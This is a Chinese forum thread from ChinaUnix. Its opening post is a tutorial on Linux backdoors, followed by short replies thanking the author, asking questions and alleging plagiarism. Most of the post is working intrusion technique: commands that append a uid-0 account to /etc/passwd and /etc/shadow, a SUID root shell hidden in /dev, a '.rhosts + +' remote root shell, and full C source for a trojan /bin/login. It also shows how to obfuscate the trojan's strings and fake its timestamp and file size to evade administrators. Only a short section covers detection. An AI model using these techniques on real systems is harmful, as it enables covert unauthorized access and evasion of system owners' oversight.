免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
最近访问板块 发新帖
查看: 4526 | 回复: 9
打印 上一主题 下一主题

Linux后门技术及实践 [复制链接]

论坛徽章:
0
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2006-10-26 10:53 |只看该作者 |倒序浏览
后门简介\r\n\r\n  入侵者完全控制系统后,为方便下次进入而采用的一种技术。\r\n\r\n  一般通过修改系统配置文件和安装第三方后门工具来实现。 具有隐蔽性,能绕开系统日志,不易被系统管理员发现等特点。\r\n\r\n  常用后门技术\r\n\r\n   增加超级用户账号\r\n   破解/嗅探用户密码\r\n   放置SUID Shell\r\n   rhosts + +\r\n   利用系统服务程序\r\n   TCP/UDP/ICMP Shell\r\n   Crontab定时任务\r\n   共享库文件\r\n   工具包rootkit\r\n   可装载内核模块(LKM)\r\n\r\n  增加超级用户\r\n\r\n# echo \"e4gle:0:0::/:/bin/sh\" >> /etc/passwd\r\n# echo \"e4gle::-1:-1:-1:-1:-1:-1:500\" >> /etc/shadow\r\n\r\n  如果系统不允许uid=0的用户远程登录,还需要增加一个普通用户账号。\r\n\r\n  破解/嗅探用户密码\r\n\r\n  获得shadow文件后,用John the Ripper 工具破解薄弱的用户密码。安装sniffit等嗅探工具,监听telnet、ftp等端口,收集用户密码。\r\n\r\n  放置SUID Shell\r\n\r\n# cp /bin/bash /dev/.rootshell\r\n# chmod u+s /dev/.rootshell\r\n\r\n  普通用户在本机运行/dev/.rootshell,即可获得一个root权限的shell。\r\n\r\nrhosts + +\r\n\r\n# echo \"+ +\" > /.rhosts\r\n# rsh -l root victim.com csh -i\r\n\r\n  远程可以得到一个rootshell。\r\n\r\n  利用系统服务程序\r\n\r\n  修改/etc/inetd.conf, daytime stream tcp nowait /bin/sh sh -I ;用trojan程序替换in.telnetd、in.rexecd等inted的服务程序\r\n重定向login程序\r\n\r\nTCP/UDP/ICMP Shell\r\n\r\n  BindShell,大部分是基于TCP/UDP协议的网络服务程序,在高端口监听,很容易被发现。Ping Backdoor,通过ICMP包激活后门,形成一个Shell通道。\r\n\r\n  TCP ACK数据包后门,能够穿越防火墙。\r\n\r\n  Crontab定时任务\r\n\r\n  通过Crontab程序调度已安装的后门程序定时运行,一般在深夜时段,是系统管理员不在线的时间。\r\n\r\n  共享库文件\r\n\r\n  在共享库中嵌入后门函数使用后门口令激活Shell,获得权限能够躲避系统管理员对二进制文件本身的校验\r\n\r\n  工具包rootkit\r\n\r\n  包含一系列系统及后门工具:\r\n\r\n   - 清除日志中的登录记录\r\n   - 伪装校验和\r\n   - 替换netstat、ps等网络工具\r\n   - 后门登录程序易于安装和使用\r\n\r\n  可装载内核模块(LKM)\r\n\r\n  LKM:Loadable Kernel Modules 动态的加载,不需要重新编译内核。\r\n\r\n  截获系统调用,具有隐藏目录、文件、进程、网络连接等强大功能。\r\n\r\n  自身隐蔽性好,发现难度较大。\r\n\r\n  著名的LKM包有adore和knark。\r\n\r\n  后门的检测\r\n\r\n  以自己的经验,结合特定的工具,手工作一些检测。\r\n\r\n  使用Tripwire或md5校验来检查系统。\r\n\r\n  借助IDS系统,监听到目标机器的可疑网络连接。\r\n\r\n  实例:login后门\r\n\r\n  入侵者先把原始的/bin/login备份,再用一段程序替换/bin/login。入侵者telnet登录进来的时候,通过环境变量或者终端类型\r\n传递了正确的后门密码,将直接获得一个Shell;如果是普通用户登录,将会重定向到原始的login文件,来处理正常的登录。\r\n\r\n  最简单的login后门ulogin.c源代码如下:\r\n\r\n  实例:login后门\r\n\r\n#include <stdio.h>\r\n#define PASSWORD \"passWORD\"\r\n#define _PATH_LOGIN \"/sbin/logins\"\r\n\r\nmain (argc, argv, envp)\r\nint argc;\r\nchar **argv, **envp;\r\n{\r\n char *display = getenv(\"DISPLAY\";\r\n if ( display == NULL ) {\r\n  execve(_PATH_LOGIN, argv, envp);\r\n  perror(_PATH_LOGIN);\r\n  exit(1);\r\n }\r\n if (!strcmp(display,PASSWORD)) {\r\n  system(\"/bin/csh\";\r\n  exit(1);\r\n }\r\n execve(_PATH_LOGIN, argv, envp);\r\n exit(1);\r\n}\r\n\r\n  利用后门登录\r\n\r\n  首先Telnet服务是打开的,在自己机器上:\r\n\r\nbash$ export DISPLAY=passWORD\r\nbash$ telnet victim.com\r\nTrying xxx.xxx.xxx.xxx...\r\nConnected to victim.com (xxx.xxx.xxx.xxx).\r\nEscape character is \'^]\'.\r\n% _\r\n\r\n  strings命令\r\n\r\n  strings命令能够打印出二进制文件中的可显示字符串,用于刚才的ulogin程序:\r\n\r\nbash$ strings ulogin\r\n/lib/ld-linux.so.2\r\n..............\r\nDISPLAY\r\n/sbin/logins\r\npassWORD\r\n/bin/csh\r\n\r\n  加密后门密码\r\n\r\n  1,采用DES算法,即crypt( )函数,编写gen.c程序:\r\n\r\n#include <unistd.h>\r\nmain(int argc, char *argv[])\r\n{\r\nif (argc != 3) {\r\nprintf(\"usage: %s <password> <salt>\\n\", argv[0]);\r\nexit(1);\r\n}\r\nprintf(\"%s\\n\", crypt(argv[1], argv[2]));\r\n}\r\n\r\n  2、编译为gen,执行./gen hack ui,得到的shadow结果为UiVqMWvDrIQjA。\r\n\r\n  3、修改后门源程序ulogin.c:\r\n\r\n  -- 以密文形式的密码代替ulogin.c中define的宏PASSWORD值。\r\n\r\n  -- 如果后门密码正确,直接给出Shell:\r\n\r\nif (!strcmp(PASSWORD, crypt(display,PASSWORD)))\r\n{\r\nsystem(SHELL);\r\nexit(1);\r\n}\r\n\r\n  用strings命令只能看到加密过的密码。\r\n\r\n  采用异或(XOR)算法\r\n\r\n  以十六进制方式表示字符串,以达到non- printable的效果\r\n\r\n  1、编码程序encode.c如下:\r\n\r\nchar magic[]=\"\\x71\\x67\\x6d\\x7a\\x65\\x61\\x7a\";\r\nchar *de(char *str,char *key)\r\n{\r\nint i=0,j=0,len;\r\nlen=strlen(key);\r\nwhile(str != \'\\0\') {\r\nstr^=key[j];\r\nj++;\r\nif(j==len) j=0;\r\ni++;\r\n}\r\nreturn str;\r\n}\r\nvoid display(char *str)\r\n{\r\nint i;\r\nfor(i=0;i<strlen(str);i++) printf(\"\\\\x%x\",str);\r\nprintf(\"\\n\";\r\n}\r\nmain()\r\n{\r\nchar gets[100], *ptr;\r\nptr=gets;\r\nscanf (\"%s\",ptr);\r\nde(ptr,magic);display(ptr);\r\n}\r\n\r\n  2、编译程序encode,依次执行得到关键字符串与magic串异或后的结果,例如原始login的文件名/sbin/xlogin,经过异或后为:\r\n\\x5e\\x14\\xf\\x13\\xb\\x4e\\x2\\x1d\\x8\\xa\\x13\\xb\r\n\r\n  3、在后门源代码中这样定义:\r\n\r\nChar\r\nlogin[]=\"\\x5e\\x14\\xf\\x13\\xb\\x4e\\x2\\x1d\\x8\\xa\\x13\\xb\";\r\n\r\n  然后插入异或函数char *de()结合同一magic串,就能判断出正确的后门密码。\r\n\r\n  用strings命令看不到密码、路径等字符串了。\r\n\r\n  最后的修饰\r\n\r\n  使后门程序ulogin的strings输出类似于正常login的strings输出,做法为:\r\n\r\n  在ulogin.c代码中增加一个字符串数组char strings[] =\"\";,在引号中填入正常login程序的strings输出结果。\r\n\r\n  以假乱真,增加迷惑性。\r\n\r\n  调整后门程序的文件日期、大小等属性:\r\n\r\n  1、日期\r\n\r\n# ls -l /sbin/xlogin\r\n-r-sr-xr-x root root 19300 Feb 11 1998\r\n/sbin/xlogin\r\n# touch -t 199802110000 ulogin\r\n# _\r\n\r\n  2、调整大小\r\n\r\n# ls -l ulogin /sbin/xlogin\r\n-r-sr-xr-x root root 7542 Feb 11 1998 ulogin\r\n-r-sr-xr-x root root 19300 Feb 11 1998 /sbin/xlogin\r\n# bc\r\n19300-7542\r\n11758\r\n# dd if=/sbin/xlogin of=/tmp/t bs=11758 count=1\r\n1+0 records in\r\n1+0 records out\r\n11758 bytes transferred in 0.000379 secs (31016746\r\nbytes/sec)\r\n# cat /tmp/t >> ulogin\r\n\r\n  Login后门的检测\r\n\r\n  使用命令md5sum对现有/bin/login文件作校验,与以前的值作比较。\r\n\r\n  使用Red Hat Linux的RPM校验:\r\n\r\n# rpm -V util-linux\r\n\r\n  在入侵者已经利用后门登录的情况下,who是看不到用户的,查看系统进程,查找login -h xxx.xxx.xxx.xxx的字样。

论坛徽章:
0
2 [报告]
发表于 2006-10-28 12:58 |只看该作者
不错,找了好久终于有人在这方面进行究。好像对于c\r\n的要求也不是很高,下了回去好好的看一看了。

论坛徽章:
0
3 [报告]
发表于 2006-10-31 02:42 |只看该作者
读了楼主近来的六篇文章,觉得很有收获。谢谢。偶已经把第四篇介绍到Solaris 版了。\r\n1。Linux后门技术及实践\r\n2。netcat教程(教你怎么用瑞士军刀)  \r\n3。网络管理员和黑客都应知道的几条命令\r\n4。我的黑色工具箱—几款黑客工具的使用方法\r\n5。常用黑客工具的使用方法集锦\r\n6。很酷的一篇入侵分析\r\n\r\n期待看到楼主关于如何防范进攻及介绍系统安全工具的文章。

论坛徽章:
0
4 [报告]
发表于 2006-10-31 22:12 |只看该作者
看了,我是新手有些没有看明白,我收藏了回头慢慢研究!

论坛徽章:
0
5 [报告]
发表于 2006-11-01 17:07 |只看该作者
\"使用命令md5sum对现有/bin/login文件作校验,与以前的值作比较\"这个值如何检查啊

论坛徽章:
0
6 [报告]
发表于 2006-11-01 22:35 |只看该作者

佩服

我看了搂住的文章就有一个一种佩服的心情\r\n\r\n还,我学习linux好长时间,水平还是那样。\r\n\r\n我想学习linux的网络编程 ,请搂住指点指点。\r\n\r\n我读内核很长时间了,可是总是连贯不起来。

论坛徽章:
0
7 [报告]
发表于 2006-11-10 10:42 |只看该作者
好贴。。。。\r\n虽然不怎么看的懂,呵呵

论坛徽章:
1
荣誉版主
日期:2011-11-23 16:44:17
8 [报告]
发表于 2006-11-10 12:18 |只看该作者
  1. # echo \"e4gle::-1:-1:-1:-1:-1:-1:500\" >> /etc/shadow
复制代码
\r\n请问这个是什么意思啊? 这个是楼主原创的吗?

论坛徽章:
0
9 [报告]
发表于 2006-11-13 10:13 |只看该作者

论坛徽章:
1
荣誉版主
日期:2011-11-23 16:44:17
10 [报告]
发表于 2006-11-13 10:51 |只看该作者
看来都是天下文章一大抄啊.实在不能认同那些拿着别人东西说是自己的东西的人.
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP